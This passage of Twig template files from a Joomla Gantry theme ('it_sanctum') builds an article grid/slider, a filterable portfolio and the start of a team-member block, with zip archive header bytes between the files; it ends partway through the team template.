{% set article_settings = particle.article %}
{% set filter = article_settings.filter %}
{% set sort = article_settings.sort %}
{% set limit = article_settings.limit %}
{% set display = article_settings.display %}

{# Category Finder #}
{% set category_options = filter.categories ? {id: [filter.categories|split(','), 0]} : {} %}
{% set categories = joomla.finder('category', category_options).published(1).language().limit(0).find() %}

{# Content Finder #}
{% if filter.articles %}
	{% set article_options = filter.articles ? {id: [filter.articles|replace(' ', '')|split(',')]} : {} %}
	{% set article_finder = joomla.finder('content', article_options).published(1).language() %}
{% else %}
	{% set article_finder = joomla.finder('content').category(categories).published(1).language() %}
{% endif %}

{% set featured = filter.featured|default('include') %}
{% if featured == 'exclude' %}
	{% do article_finder.featured(false) %}
{% elseif featured == 'only' %}
	{% do article_finder.featured(true) %}
{% endif %}

{% set articles = article_finder.order(sort.orderby, sort.ordering).limit(limit.total).start(limit.start).find() %}

{% set particleheading %}
	<div class="g-particle-intro">
		{% if particle.mainheading %}
			<h3 class="g-title g-main-title">{{ particle.mainheading|raw }}</h3>
			<div class="g-title-separator {% if particle.introtext == false %}no-intro-text{% endif %}"></div>
		{% endif %}	
		{% if particle.introtext %}<p class="g-introtext">{{ particle.introtext|raw }}</p>{% endif %}
	</div>
{% endset %}

{% set contentproitems %}
	{% for row in articles|batch(particle.columns|default('3')|e) %}
		{% if particle.behaviour|default('static') == 'static' %}<div class="g-grid">{% endif %}
			{% for article in row %}

				{% set cat = article.categories|last %}

				{% set image %}
					{% if particle.height %}
						{% set articleimage %}
							{%- if article.images.image_intro and display.image.enabled == 'intro' -%}
								background-image: url({{ url(article.images.image_intro) }})
							{%- elseif article.images.image_fulltext and display.image.enabled == 'full' -%}
								background-image: url({{ url(article.images.image_fulltext) }})
							{%- endif -%}
						{% endset %}

						{%- set imageheight -%}
							height: {{ particle.height|default('')|e }}px
						{%- endset -%}
					{% endif %}

					{% if article.images.image_intro and (display.image.enabled == 'intro' or display.image.enabled == 'show') %}

						<div class="g-content-pro-image"{% if particle.height %} style="{{ articleimage }}; {{ imageheight }};"{% endif %}>
							{% if particle.lightbox|default('enable') == 'enable' or particle.lightbox|default('enable') == 'disable' %}
								{% if particle.lightbox|default('enable') == 'enable' %}
									<a href="{{ url(article.images.image_intro, false, 0) }}" data-uk-lightbox class="uk-overlay uk-overlay-hover"{% if particle.height %} aria-label="{{ display.title.limit ? article.title|truncate_text(display.title.limit) : article.title }}"{% endif %}>
									{% if particle.style|default('style1') == 'style1' %}
										<span class="uk-overlay-panel uk-overlay-background uk-overlay-icon uk-overlay-fade"></span>
									{% endif %}
								{% endif %}
								{% if particle.height == 0 %}
									<img src="{{ url(article.images.image_intro) }}" {{ article.images.image_intro|imagesize|raw }} alt="{{ display.title.limit ? article.title|truncate_text(display.title.limit) : article.title }}" />
								{% endif %}
								{% if particle.lightbox|default('enable') == 'enable' %}
									</a>
								{% endif %}
							{% endif %}

							{% if particle.lightbox|default('enable') == 'disablelink' %}
								<a href="{{ article.route }}"{% if particle.height %} aria-label="{{ display.title.limit ? article.title|truncate_text(display.title.limit) : article.title }}"{% endif %}>
									{% if particle.height == 0 %}
										<img src="{{ url(article.images.image_intro) }}" {{ article.images.image_intro|imagesize|raw }} alt="{{ display.title.limit ? article.title|truncate_text(display.title.limit) : article.title }}" />
									{% endif %}	
								</a>
							{% endif %}
						</div>

					{% elseif article.images.image_fulltext and display.image.enabled == 'full' %}

						<div class="g-content-pro-image"{% if particle.height %} style="{{ articleimage }}; {{ imageheight }};"{% endif %}>
							{% if particle.lightbox|default('enable') == 'enable' or particle.lightbox|default('enable') == 'disable' %}
								{% if particle.lightbox|default('enable') == 'enable' %}
									<a href="{{ url(article.images.image_fulltext, false, 0) }}" data-uk-lightbox class="uk-overlay uk-overlay-hover"{% if particle.height %} aria-label="{{ display.title.limit ? article.title|truncate_text(display.title.limit) : article.title }}"{% endif %}>
									{% if particle.style|default('style1') == 'style1' %}
										<span class="uk-overlay-panel uk-overlay-background uk-overlay-icon uk-overlay-fade"></span>
									{% endif %}
								{% endif %}
								{% if particle.height == 0 %}
									<img src="{{ url(article.images.image_fulltext) }}" {{ article.images.image_fulltext|imagesize|raw }} alt="{{ display.title.limit ? article.title|truncate_text(display.title.limit) : article.title }}" />
								{% endif %}
								{% if particle.lightbox|default('enable') == 'enable' %}
									</a>
								{% endif %}
							{% endif %}

							{% if particle.lightbox|default('enable') == 'disablelink' %}
								<a href="{{ article.route }}"{% if particle.height %} aria-label="{{ display.title.limit ? article.title|truncate_text(display.title.limit) : article.title }}"{% endif %}>
									{% if particle.height == 0 %}
										<img src="{{ url(article.images.image_fulltext) }}" {{ article.images.image_fulltext|imagesize|raw }} alt="{{ display.title.limit ? article.title|truncate_text(display.title.limit) : article.title }}" />
									{% endif %}
								</a>
							{% endif %}
						</div>

					{% endif %}
				{% endset %}

				{% set articletitle %}
					<h4 class="g-content-pro-title">
						{%- if display.title.enabled|default('show') == 'show' -%}
							<a href="{{ article.route }}">
								{{- display.title.limit ? article.title|truncate_text(display.title.limit) : article.title -}}
							</a>
						{%- else -%}
							{{- display.title.limit ? article.title|truncate_text(display.title.limit) : article.title -}}
						{%- endif -%}
					</h4>
				{% endset %}	

				{% set articledetails %}
					<div class="g-article-details details-{{ particle.articledetails }}">
						{% if display.date.enabled %}
							<span class="g-article-date">
								{%- if display.date.enabled == 'published' -%}
									<i class="fa fa-clock-o"></i>{{- article.publish_up|date(display.date.format) -}}
								{%- elseif display.date.enabled == 'modified' -%}
									<i class="fa fa-clock-o"></i>{{- article.modified|date(display.date.format) -}}
								{%- else -%}
									<i class="fa fa-clock-o"></i>{{- article.created|date(display.date.format) -}}
								{%- endif -%}
							</span>
						{% endif %}

						{% if display.author.enabled %}
							<span class="g-article-author">
								{%- if display.author.enabled|default('show') == 'show' -%}
									<i class="fa fa-user"></i>{{- article.author.name -}}
								{%- else -%}
									{% if article.created_by_alias %}
										<i class="fa fa-user"></i>{{- article.created_by_alias -}}
									{%- else -%}
										<i class="fa fa-user"></i>{{- article.author.name -}}
									{%- endif -%}
								{%- endif -%}
							</span>
						{% endif %}

						{% if display.category.enabled %}
							{% set category_link = display.category.enabled == 'link' %}
							<span class="g-article-category">
								{% if category_link %}
									<a href="{{ cat.route }}">
										<i class="fa fa-folder-open"></i>{{- cat.title -}}
									</a>
								{% else %}
									<i class="fa fa-folder-open"></i>{{- cat.title -}}
								{% endif %}
							</span>
						{% endif %}

						{% if display.hits.enabled %}
							<span class="g-article-hits">
								<i class="fa fa-eye"></i>{{- article.hits -}}
							</span>
						{% endif %}
					</div>
				{% endset %}

				{% set articletext %}
					{% set article_text = display.text.type == 'intro' ? article.introtext : article.text %}
					<div class="g-content-pro-desc">
						{%- if display.text.formatting == 'text' -%}
							{{ article_text|truncate_text(display.text.limit)|raw }}
						{%- else -%}
							{{ gantry.platform.filter(article_text)|truncate_html(display.text.limit)|html|raw }}
						{%- endif -%}
					</div>
				{% endset %}

				{% set readmorebutton %}
					<div class="g-article-read-more">
						<a class="button" href="{{ article.route }}">
							{{- display.read_more.label|default('Read More...') -}}
						</a>
					</div>
				{% endset %}

				{% set style1 %}
					<div class="g-content-pro-item g-cat-{{ cat.alias|lower }}{% if article.featured == 1 %} g-featured-article{% endif %}">
						{% if display.image.enabled and (article.images.image_intro or article.images.image_fulltext) %}
							{{ image }}
						{% endif %}

						{% if display.title.enabled or particle.articledetails|default('show') != 'hide' or display.text.type or display.read_more.enabled %}
							<div class="g-info-container">
								{% if display.title.enabled %}
									{{ articletitle }}
								{% endif %}

								{% if particle.articledetails|default('show') == 'show' %}
									{{ articledetails }}
								{% endif %}

								{% if display.text.type %}
									{{ articletext }}
								{% endif %}

								{% if display.read_more.enabled %}
									{{ readmorebutton }}
								{% endif %}

								{% if particle.articledetails|default('show') == 'showbottom' %}
									{{ articledetails }}
								{% endif %}
							</div>
						{% endif %}
					</div>
				{% endset %}

				{% set style2 %}
					<div class="g-content-pro-item uk-overlay uk-overlay-hover g-cat-{{ cat.alias|lower }}{% if article.featured == 1 %} g-featured-article{% endif %}">
						{% if display.image.enabled and (article.images.image_intro or article.images.image_fulltext) %}
							{{ image }}
						{% endif %}

						{% if display.title.enabled or particle.articledetails|default('show') != 'hide' or display.text.type or display.read_more.enabled %}
							<div class="g-info-container-style2 uk-overlay-panel uk-overlay-background uk-overlay-bottom uk-overlay-slide-bottom">
								{% if display.title.enabled %}
									{{ articletitle }}
								{% endif %}

								{% if particle.articledetails|default('show') == 'show' %}
									{{ articledetails }}
								{% endif %}

								{% if display.text.type %}
									{{ articletext }}
								{% endif %}

								{% if display.read_more.enabled %}
									{{ readmorebutton }}
								{% endif %}

								{% if particle.articledetails|default('show') == 'showbottom' %}
									{{ articledetails }}
								{% endif %}
							</div>
						{% endif %}
					</div>
				{% endset %}

				{% set style3 %}
					<div class="g-content-pro-item uk-overlay g-cat-{{ cat.alias|lower }}{% if article.featured == 1 %} g-featured-article{% endif %}">
						{% if display.image.enabled and (article.images.image_intro or article.images.image_fulltext) %}
							{{ image }}
						{% endif %}

						{% if display.title.enabled or particle.articledetails|default('show') != 'hide' or display.text.type or display.read_more.enabled %}
							<div class="g-info-container-style2 uk-overlay-panel uk-overlay-background uk-overlay-bottom">
								{% if display.title.enabled %}
									{{ articletitle }}
								{% endif %}

								{% if particle.articledetails|default('show') == 'show' %}
									{{ articledetails }}
								{% endif %}

								{% if display.text.type %}
									{{ articletext }}
								{% endif %}

								{% if display.read_more.enabled %}
									{{ readmorebutton }}
								{% endif %}

								{% if particle.articledetails|default('show') == 'showbottom' %}
									{{ articledetails }}
								{% endif %}
							</div>
						{% endif %}
					</div>
				{% endset %}

				{% if particle.behaviour|default('static') == 'static' %}
					<div class="g-block">
						<div {% if particle.gutter|default('enabled') == 'enabled' %}class="g-content"{% endif %}>
							{% if particle.style|default("style1") == "style1" %}{{ style1 }}{% endif %}
							{% if particle.style|default("style1") == "style2" %}{{ style2 }}{% endif %}
							{% if particle.style|default("style1") == "style3" %}{{ style3 }}{% endif %}
						</div>
					</div>
				{% endif %}

				{% if particle.behaviour|default('static') == 'slider' or particle.behaviour|default('static') == 'slideset' %}
					<li>
						{% if particle.style|default("style1") == "style1" %}{{ style1 }}{% endif %}
						{% if particle.style|default("style1") == "style2" %}{{ style2 }}{% endif %}
						{% if particle.style|default("style1") == "style3" %}{{ style3 }}{% endif %}
					</li>
				{% endif %}

			{% endfor %}
		{% if particle.behaviour|default('static') == 'static' %}</div>{% endif %}
	{% endfor %}
{% endset %}

{% block particle %}
	
	{% if particle.behaviour|default('static') == 'static' %}
		<div class="g-content-pro {{ particle.style|default("style1")|e }}{% if particle.css.class %} {{ particle.css.class|e }}{% endif %}{% if particle.pullup|default(0) %} g-pullup{% endif %}{% if particle.gutter|default('enabled') == 'enabled' %} gutter-enabled{% else %} gutter-disabled{% endif %}" {% if particle.extra %}{{ attr_extra|raw }}{% endif %}>
			{% if particle.mainheading or particle.introtext %}
				{{ particleheading }}
			{% endif %}
			{{ contentproitems }}
		</div>
	{% endif %}
	{% if particle.behaviour|default('static') == 'slider' %}
		<div class="g-content-pro-slider {{ particle.style|default("style1")|e }}{% if particle.css.class %} {{ particle.css.class|e }}{% endif %}{% if particle.pullup|default(0) %} g-pullup{% endif %}{% if particle.gutter|default('enabled') == 'enabled' %} gutter-enabled{% else %} gutter-disabled{% endif %}" {% if particle.extra %}{{ attr_extra|raw }}{% endif %}>
			{% if particle.mainheading or particle.introtext %}
				{{ particleheading }}
			{% endif %}		    	
			<div class="uk-slidenav-position" data-uk-slider{% if particle.autoplay|default("disable") == "enable" %}="{autoplay:true, autoplayInterval: {{ particle.autoplayInterval|default(7000)|e}}}"{% endif %}>
				<div class="uk-slider-container">
					<ul class="uk-slider{% if particle.gutter|default('enabled') == 'enabled' %} uk-grid{% endif %} uk-grid-width-medium-1-{{ particle.columns|default('3')|e }}">
						{{ contentproitems }}
					</ul>
				</div>
				{% if (particle.navigation|default('arrows') == 'arrows') or (particle.navigation|default('arrows') == 'both') %}
					<div class="g-particle-navigation">
						<a href="" class="uk-slidenav uk-slidenav-previous" data-uk-slider-item="previous" aria-label="{{'Previous'|trans_key('IT_ACCESS_PREVIOUS')}}"></a>
						<a href="" class="uk-slidenav uk-slidenav-next" data-uk-slider-item="next" aria-label="{{'Next'|trans_key('IT_ACCESS_NEXT')}}"></a>
					</div>
				{% endif %}
			</div>		    	
		</div>
	{% endif %}
	{% if particle.behaviour|default('static') == 'slideset' %}
		<div class="g-content-pro-slideset {{ particle.style|default("style1")|e }}{% if particle.css.class %} {{ particle.css.class|e }}{% endif %}{% if particle.pullup|default(0) %} g-pullup{% endif %}{% if particle.gutter|default('enabled') == 'enabled' %} gutter-enabled{% else %} gutter-disabled{% endif %}" {% if particle.extra %}{{ attr_extra|raw }}{% endif %}>
			{% if particle.mainheading or particle.introtext %}
				{{ particleheading }}
			{% endif %}	    	
			<div class="uk-slidenav-position" data-uk-slideset="{small: 1, medium: {{ particle.columns|default('3')|e }}, large: {{ particle.columns|default('3')|e }}, duration: {{ particle.duration|default(200)|e}}, {% if particle.autoplay|default("disable") == "enable" %}autoplay: 'true', autoplayInterval: {{ particle.autoplayInterval|default(7000)|e}},{% endif %} animation: '{{ particle.animation|default('fade')|e}}'}">
				<div class="uk-slider-container">
					<ul class="uk-slideset uk-grid">
						{{ contentproitems }}
					</ul>
				</div>
				{% if (particle.navigation|default('arrows') == 'arrows') or (particle.navigation|default('arrows') == 'both') %}
					<div class="g-particle-navigation">
						<a href="" class="uk-slidenav uk-slidenav-previous" data-uk-slideset-item="previous" aria-label="{{'Previous'|trans_key('IT_ACCESS_PREVIOUS')}}"></a>
						<a href="" class="uk-slidenav uk-slidenav-next" data-uk-slideset-item="next" aria-label="{{'Next'|trans_key('IT_ACCESS_NEXT')}}"></a>
					</div>
				{% endif %}
				{% if (particle.navigation|default('arrows') == 'dots') or (particle.navigation|default('arrows') == 'both') %}
					<ul class="uk-slideset-nav uk-dotnav uk-flex-center">
	    			{% set counter = 0 %}
	    			{% for article in articles %}
	    				<li data-uk-slideset-item="{{ counter }}"><a href="" aria-label="{{'Item'|trans_key('IT_ACCESS_ITEM')}} {{ counter }}"></a></li>
	    				{% set counter = counter + 1 %}
	    			{% endfor %}
					</ul>
				{% endif %}
			</div>		    	
		</div>
	{% endif %}
{% endblock %}PK!'5.�;�;(it_sanctum/particles/portfolio.html.twignu&1i�{% extends '@nucleus/partials/particle.html.twig' %}

{% set attr_extra = '' %}
{% if particle.extra %}
	{% for attributes in particle.extra %}
		{% for key, value in attributes %}
			{% set attr_extra = attr_extra ~ ' ' ~ key|e ~ '="' ~ value|e('html_attr') ~ '"' %}
		{% endfor %}
	{% endfor %}
{% endif %}

{% set particleheading %}
	<div class="g-particle-intro">
		{% if particle.mainheading %}
			<h3 class="g-title g-main-title">{{ particle.mainheading|raw }}</h3>
			<div class="g-title-separator {% if particle.introtext == false %}no-intro-text{% endif %}"></div>
		{% endif %}	
		{% if particle.introtext %}<p class="g-introtext">{{ particle.introtext|raw }}</p>{% endif %}
	</div>
{% endset %}

{% set filterid = random() %}

{% set portfolio_filter %}
	<ul id="g-portfolio-filter_{{ filterid }}" class="g-portfolio-filter uk-subnav uk-subnav-pill">
		<li class="uk-active" data-uk-filter="all"><a href="">{{ particle.filterall|default('All')|raw }}</a></li>
		{% if particle.filter1 %}<li data-uk-filter="filter1_{{ filterid }}"><a href="">{{ particle.filter1|raw }}</a></li>{% endif %}
		{% if particle.filter2 %}<li data-uk-filter="filter2_{{ filterid }}"><a href="">{{ particle.filter2|raw }}</a></li>{% endif %}
		{% if particle.filter3 %}<li data-uk-filter="filter3_{{ filterid }}"><a href="">{{ particle.filter3|raw }}</a></li>{% endif %}
		{% if particle.filter4 %}<li data-uk-filter="filter4_{{ filterid }}"><a href="">{{ particle.filter4|raw }}</a></li>{% endif %}
		{% if particle.filter5 %}<li data-uk-filter="filter5_{{ filterid }}"><a href="">{{ particle.filter5|raw }}</a></li>{% endif %}
	</ul>
{% endset %}

{% set portfolio_filter_s2 %}
	{% set all_items = 0 %}
	{% set filter1 = 0 %}
	{% set filter2 = 0 %}
	{% set filter3 = 0 %}
	{% set filter4 = 0 %}
	{% set filter5 = 0 %}
	{% for item in particle.items %}
		{% set all_items = all_items + 1 %}
		{% if item.filter1 %}{% set filter1 = filter1 + 1 %}{% endif %}
		{% if item.filter2 %}{% set filter2 = filter2 + 1 %}{% endif %}
		{% if item.filter3 %}{% set filter3 = filter3 + 1 %}{% endif %}
		{% if item.filter4 %}{% set filter4 = filter4 + 1 %}{% endif %}
		{% if item.filter5 %}{% set filter5 = filter5 + 1 %}{% endif %}
	{% endfor %}
	<ul id="g-portfolio-filter_{{ filterid }}" class="g-portfolio-filter uk-subnav uk-subnav-pill">
		<li class="uk-active" data-uk-filter="all"><a href="">{{ particle.filterall|default('All')|raw }} ({{ all_items }})</a></li>
		{% if particle.filter1 %}<li data-uk-filter="filter1_{{ filterid }}"><a href="">{{ particle.filter1|raw }} ({{ filter1 }})</a></li>{% endif %}
		{% if particle.filter2 %}<li data-uk-filter="filter2_{{ filterid }}"><a href="">{{ particle.filter2|raw }} ({{ filter2 }})</a></li>{% endif %}
		{% if particle.filter3 %}<li data-uk-filter="filter3_{{ filterid }}"><a href="">{{ particle.filter3|raw }} ({{ filter3 }})</a></li>{% endif %}
		{% if particle.filter4 %}<li data-uk-filter="filter4_{{ filterid }}"><a href="">{{ particle.filter4|raw }} ({{ filter4 }})</a></li>{% endif %}
		{% if particle.filter5 %}<li data-uk-filter="filter5_{{ filterid }}"><a href="">{{ particle.filter5|raw }} ({{ filter5 }})</a></li>{% endif %}
	</ul>
{% endset %}

{% set portfolio_filter_s3 %}
	{% set all_items = 0 %}
	{% set filter1 = 0 %}
	{% set filter2 = 0 %}
	{% set filter3 = 0 %}
	{% set filter4 = 0 %}
	{% set filter5 = 0 %}
	{% for item in particle.items %}
		{% set all_items = all_items + 1 %}
		{% if item.filter1 %}{% set filter1 = filter1 + 1 %}{% endif %}
		{% if item.filter2 %}{% set filter2 = filter2 + 1 %}{% endif %}
		{% if item.filter3 %}{% set filter3 = filter3 + 1 %}{% endif %}
		{% if item.filter4 %}{% set filter4 = filter4 + 1 %}{% endif %}
		{% if item.filter5 %}{% set filter5 = filter5 + 1 %}{% endif %}
	{% endfor %}
	<ul id="g-portfolio-filter_{{ filterid }}" class="g-portfolio-filter uk-subnav uk-subnav-pill">
		<li class="uk-active" data-uk-filter="all"><a href="" data-uk-tooltip="{cls: 'g-portfolio-tooltip'}" title="{{ all_items }}">{{ particle.filterall|default('All')|raw }}</a></li>
		{% if particle.filter1 %}<li data-uk-filter="filter1_{{ filterid }}"><a href="" data-uk-tooltip="{cls: 'g-portfolio-tooltip'}" title="{{ filter1 }}">{{ particle.filter1|raw }}</a></li>{% endif %}
		{% if particle.filter2 %}<li data-uk-filter="filter2_{{ filterid }}"><a href="" data-uk-tooltip="{cls: 'g-portfolio-tooltip'}" title="{{ filter2 }}">{{ particle.filter2|raw }}</a></li>{% endif %}
		{% if particle.filter3 %}<li data-uk-filter="filter3_{{ filterid }}"><a href="" data-uk-tooltip="{cls: 'g-portfolio-tooltip'}" title="{{ filter3 }}">{{ particle.filter3|raw }}</a></li>{% endif %}
		{% if particle.filter4 %}<li data-uk-filter="filter4_{{ filterid }}"><a href="" data-uk-tooltip="{cls: 'g-portfolio-tooltip'}" title="{{ filter4 }}">{{ particle.filter4|raw }}</a></li>{% endif %}
		{% if particle.filter5 %}<li data-uk-filter="filter5_{{ filterid }}"><a href="" data-uk-tooltip="{cls: 'g-portfolio-tooltip'}" title="{{ filter5 }}">{{ particle.filter5|raw }}</a></li>{% endif %}
	</ul>
{% endset %}

{% set portfolio_items %}
	{% set portfolioid = random() %}
	{% for row in particle.items|batch(particle.columns|default('3')|e) %}
		{% for item in row %}
			{% set attr_extra_item = '' %}
			{% for extra in item.extra %}
				{% set attr_extra_item = attr_extra_item ~ ' ' ~ extra|keys|first|e ~ '="' ~ extra|values|first|e('html_attr') ~ '"' %}
			{% endfor %}

			{% set filtertags %}
				{% if particle.filters|default('disabled') != 'disabled' %}
					data-uk-filter="all{% if item.filter1 %}, filter1_{{ filterid }}{% endif %}{% if item.filter2 %}, filter2_{{ filterid }}{% endif %}{% if item.filter3 %}, filter3_{{ filterid }}{% endif %}{% if item.filter4 %}, filter4_{{ filterid }}{% endif %}{% if item.filter5 %}, filter5_{{ filterid }}{% endif %}"
				{% endif %}
			{% endset %}

			{% set image %}
				<div class="g-portfolio-image">
					{% if particle.lightbox|default('enable') == 'enable' or particle.lightbox|default('enable') == 'disable' %}
						{% if particle.lightbox|default('enable') == 'enable' %}
							{% if item.video %}
								<a href="{{ item.video|e }}" class="uk-overlay uk-overlay-hover" data-uk-lightbox="{group:'{{ portfolioid }}'}">
							{% else %}
								<a href="{{ url(item.image, false, 0) }}" class="uk-overlay uk-overlay-hover" data-uk-lightbox="{group:'{{ portfolioid }}'}">
							{% endif %}
							{% if particle.style|default('style1') == 'style1' %}
								<span class="uk-overlay-panel uk-overlay-background uk-overlay-icon uk-overlay-fade"></span>
							{% endif %}
						{% endif %}
							<img alt="{{ item.alt|e }}" src="{{ url(item.image) }}" {{ item.image|imagesize|raw }}>
						{% if particle.lightbox|default('enable') == 'enable' %}
							</a>
						{% endif %}
					{% endif %}

					{% if particle.lightbox|default('enable') == 'disablelink' %}
						{% if item.link %}<a target="{{ item.target|default('_parent')|e }}" href="{{ item.link|e }}">{% endif %}
							<img alt="{{ item.alt|e }}" src="{{ url(item.image) }}" {{ item.image|imagesize|raw }}>
						{% if item.link %}</a>{% endif %}
					{% endif %}
				</div>
			{% endset %}

			{% set title %}
				<h4 class="g-portfolio-title">
					{%- if item.link -%}
						<a target="{{ item.target|default('_parent')|e }}" href="{{ item.link|e }}">
					{%- endif -%}
						{{- item.title|raw -}}
					{%- if item.link -%}
						</a>
					{%- endif -%}
				</h4>
			{% endset %}

			{% set date %}
				<div class="g-item-details">
					<span class="date"><i class="fa fa-clock-o"></i>{{ item.date|raw }}</span>
				</div>
			{% endset %}

			{% set description %}
				<div class="g-portfolio-desc">
					{{- item.description|raw -}}
				</div>
			{% endset %}

			{% set specialtext %}
				<div class="g-portfolio-special">
					{%- if item.icon -%}
						<i class="{{ item.icon|e }}"></i>
					{%- endif -%}
					{{- item.specialtext|raw -}}
				</div>
			{% endset %}

			{% set bottomlink %}
				<div class="g-portfolio-link">
					<a target="{{ item.target|default('_parent')|e }}" href="{{ item.link|e }}">
						{{- item.bottomlink|raw -}}
						<i class="fa fa-long-arrow-right"></i>
					</a>
				</div>
			{% endset %}

			{% set style1 %}
				<div class="g-portfolio-item-container{% if item.class %} {{ item.class|e }}{% endif %}" {{ filtertags }}>
					<div class="g-portfolio-item"{% if item.extra %} {{ attr_extra_item|raw }}{% endif %}>
						{% if item.image %}
							{{ image }}
						{% endif %}

						{% if item.title or item.description %}
							<div class="g-info-container">
								{% if item.title %}
									{{ title }}
								{% endif %}

								{% if item.date %}
									{{ date }}
								{% endif %}

								{% if item.description %}
									{{ description }}
								{% endif %}

								{% if item.specialtext or item.bottomlink %}
									<div class="g-bottom-info clearfix{% if item.specialtext == false %} no-special{% endif %}{% if item.bottomlink == false %} no-link{% endif %}">
										{% if item.specialtext %}
											{{ specialtext }}
										{% endif %}

										{% if item.bottomlink %}
											{{ bottomlink }}
										{% endif %}
									</div>
								{% endif %}
							</div>
						{% endif %}
					</div>
				</div>
			{% endset %}

			{% set style2 %}
				<div class="g-portfolio-item-container{% if item.class %} {{ item.class|e }}{% endif %}" {{ filtertags }}>
					<div class="g-portfolio-item uk-overlay uk-overlay-hover"{% if item.extra %} {{ attr_extra_item|raw }}{% endif %}>
						{% if item.image %}
							{{ image }}
						{% endif %}

						{% if item.title or item.description %}
							<div class="g-info-container-style2 uk-overlay-panel uk-overlay-background uk-overlay-bottom uk-overlay-slide-bottom">
								{% if item.title %}
									{{ title }}
								{% endif %}

								{% if item.date %}
									{{ date }}
								{% endif %}

								{% if item.description %}
									{{ description }}
								{% endif %}

								{% if item.specialtext or item.bottomlink %}
									<div class="g-bottom-info clearfix{% if item.specialtext == false %} no-special{% endif %}{% if item.bottomlink == false %} no-link{% endif %}">
										{% if item.specialtext %}
											{{ specialtext }}
										{% endif %}

										{% if item.bottomlink %}
											{{ bottomlink }}
										{% endif %}
									</div>
								{% endif %}
							</div>
						{% endif %}
					</div>
				</div>
			{% endset %}

			{% set style3 %}
				<div class="g-portfolio-item-container{% if item.class %} {{ item.class|e }}{% endif %}" {{ filtertags }}>
					<div class="g-portfolio-item"{% if item.extra %} {{ attr_extra_item|raw }}{% endif %}>
						{% if item.image %}
							{{ image }}
						{% endif %}

						{% if item.title or item.description %}
							<div class="g-info-container">
								{% if item.title %}
									{{ title }}
								{% endif %}

								{% if item.date %}
									{{ date }}
								{% endif %}

								{% if item.description %}
									{{ description }}
								{% endif %}

								{% if item.specialtext or item.bottomlink %}
									<div class="g-bottom-info clearfix{% if item.specialtext == false %} no-special{% endif %}{% if item.bottomlink == false %} no-link{% endif %}">
										{% if item.specialtext %}
											{{ specialtext }}
										{% endif %}

										{% if item.bottomlink %}
											{{ bottomlink }}
										{% endif %}
									</div>
								{% endif %}
							</div>
						{% endif %}
					</div>
				</div>
			{% endset %}

			{% set style4 %}
				<div class="g-portfolio-item-container{% if item.class %} {{ item.class|e }}{% endif %}" {{ filtertags }}>
					<div class="g-portfolio-item uk-overlay"{% if item.extra %} {{ attr_extra_item|raw }}{% endif %}>
						{% if item.image %}
							{{ image }}
						{% endif %}

						{% if item.title or item.description %}
							<div class="g-info-container-style2 uk-overlay-panel uk-overlay-background uk-overlay-bottom">
								{% if item.title %}
									{{ title }}
								{% endif %}

								{% if item.date %}
									{{ date }}
								{% endif %}

								{% if item.description %}
									{{ description }}
								{% endif %}

								{% if item.specialtext or item.bottomlink %}
									<div class="g-bottom-info clearfix{% if item.specialtext == false %} no-special{% endif %}{% if item.bottomlink == false %} no-link{% endif %}">
										{% if item.specialtext %}
											{{ specialtext }}
										{% endif %}

										{% if item.bottomlink %}
											{{ bottomlink }}
										{% endif %}
									</div>
								{% endif %}
							</div>
						{% endif %}
					</div>
				</div>
			{% endset %}

			{% if particle.style|default("style1") == "style1" %}{{ style1 }}{% endif %}
			{% if particle.style|default("style1") == "style2" %}{{ style2 }}{% endif %}
			{% if particle.style|default("style1") == "style3" %}{{ style3 }}{% endif %}
			{% if particle.style|default("style1") == "style4" %}{{ style4 }}{% endif %}

		{% endfor %}
	{% endfor %}
{% endset %}

{% block particle %}

	<div class="g-portfolio {{ particle.style|default("style1")|e }}{% if particle.css.class %} {{ particle.css.class|e }}{% endif %}{% if particle.filters|default('disabled') != 'disabled' %} filters-enabled{% else %} filters-disabled{% endif %}{% if particle.gutter|default('enabled') == 'enabled' %} gutter-enabled{% else %} gutter-disabled{% endif %}" {% if particle.extra %}{{ attr_extra|raw }}{% endif %}>
		{% if particle.mainheading or particle.introtext %}
			{{ particleheading }}
		{% endif %}

		{% if particle.filters|default('disabled') == 'enabled' %}{{ portfolio_filter }}{% endif %}
		{% if particle.filters|default('disabled') == 'enabled2' %}{{ portfolio_filter_s2 }}{% endif %}
		{% if particle.filters|default('disabled') == 'enabled3' %}{{ portfolio_filter_s3 }}{% endif %}

		<div class="uk-grid-width-small-1-2 uk-grid-width-medium-1-3 uk-grid-width-large-1-{{ particle.columns|default('3')|e }}" data-uk-grid="{ {% if particle.gutter|default('enabled') == 'enabled' %}gutter: 30,{% endif %}{% if particle.filters|default('disabled') != 'disabled' %}controls: '#g-portfolio-filter_{{ filterid }}'{% endif %} }">
			{{ portfolio_items }}
		</div>
	</div>
{% endblock %}

{% block javascript_footer %}
	{{ parent() }}
	<script type="text/javascript">
		(function($) {
			$(document).ready(function() { 
				$("[data-uk-filter]").on("click", function() {
					function gridAfterFilter() {
						$('[data-uk-grid]').trigger('display.uk.check');
					}
					setTimeout(gridAfterFilter, 450);
				})
			});

			$(window).load(function() {
				var portfolioConteiner = $(".g-portfolio.style3 .info-container-top .g-info-container");
				var portfolioConteinerHeight = $(portfolioConteiner).outerHeight();

				$(portfolioConteiner).css({
					'top' : -(portfolioConteinerHeight - 1) + 'px'
				});
			});
		})(jQuery);
	</script>
{% endblock %}
PK!��R�E�E'it_sanctum/particles/our-team.html.twignu&1i�{% extends '@nucleus/partials/particle.html.twig' %}

{% set attr_extra = '' %}
{% if particle.extra %}
    {% for attributes in particle.extra %}
        {% for key, value in attributes %}
            {% set attr_extra = attr_extra ~ ' ' ~ key|e ~ '="' ~ value|e('html_attr') ~ '"' %}
        {% endfor %}
    {% endfor %}
{% endif %}

{% set particleheading %}
    <div class="g-particle-intro">
        {% if particle.mainheading %}
            <h3 class="g-title g-main-title">{{ particle.mainheading|raw }}</h3>
            <div class="g-title-separator {% if particle.introtext == false %}no-intro-text{% endif %}"></div>
        {% endif %} 
        {% if particle.introtext %}<p class="g-introtext">{{ particle.introtext|raw }}</p>{% endif %}
    </div>
{% endset %}

{% set ourteamitems %}
    {% for row in particle.items|batch(particle.columns|default('3')|e) %}
        {% if particle.behaviour|default('static') == 'static' %}<div class="g-grid">{% endif %}
            {% for item in row %}
                {% set attr_extra_item = '' %}
                {% for extra in item.extra %}
                    {% set attr_extra_item = attr_extra_item ~ ' ' ~ extra|keys|first|e ~ '="' ~ extra|values|first|e('html_attr') ~ '"' %}
                {% endfor %}

                {% set image %}
                    <img alt="{{ item.alt|e }}" src="{{ url(item.image) }}" {{ item.image|imagesize|raw }}>
                {% endset %}

                {% set socialicons %}
                    {% if item.facebook %}
                        {% if particle.style|default("style1") == "style1" %}
